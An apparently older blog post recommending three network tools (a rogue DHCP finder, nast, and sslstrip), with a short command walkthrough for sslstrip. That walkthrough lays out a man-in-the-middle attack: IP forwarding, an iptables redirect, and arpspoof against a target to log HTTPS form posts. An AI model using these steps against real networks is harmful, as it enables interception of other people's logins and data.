Three lesser known security tools for your arsenal

Roadkil’s DHCP Find

A small and efficient, windows based, app to find rogue DHCP servers.  It works by simply sending out DHCP requests and logging all the servers that  reply.  Not much to it, but when you are tracking down DHCP servers, this will be extremely valuable. DHCP Find 1.2

Nast

Let’s face it, tools like tcpdump and nmap are unbelievably powerful,  but without a lot of patience and a lot of experience they can both be overwhelming. Enter “nast”.  Nast is like the swiss army knife you keep in your pocket.  Its a handy set of very useful tools for network troubleshooting (and mischief) all wrapped into one handy program.  It has increasingly become my “go to” tool when i just want to get a job done. Here is a sampling of its features:

  • Sniffing/Dumping packets in ascii, ascii hex, and tcpdump formats
  • Remote promiscuous mode checking – Who else is monitoring the network?
  • Host listing – build a quick list of available hosts using arp
  • Gateway discovery – Are there multiple ways out of your network?
  • Reset connection – Destroy a connection in progress.  This could be fun!
  • Port scanning –  A quick, half-open scan, noting possible firewall rules.  Again, this seems really speedy

See the nast homepage for source code, full man page and contact information

SSLStrip

Curious about what is actually being sent back and forth in your https session?  Take a little peak with sslstrip. Unlike our previous tools, sslstrip requires a little upfront work to get going. You will need a linux box to do the work on.

  • Turn on forwarding: echo "1" > /proc/sys/net/ipv4/ip_forward
  • Set iptables to redirect to whatever port you want sslstrip to listen on: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
  • Start sslstrip sslstrip -w -l
  • In another screen tail -f output.log (if you want)
  • Now your box is ready to snoop on any forwarded ssl connections, lets send them our way. In another screen use the command arpspoof -i -t

With everything running, test out a few https webpages. You should see the contents of your http post appear in the logfile.  Check the options of sslstrip for more detailed logging and other features.

Sslstrip can be found at http://www.thoughtcrime.org/software/sslstrip/ .  Arpspoof is part of dnsiff, which can be found over here.

Share

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <pre user="" computer="" escaped="">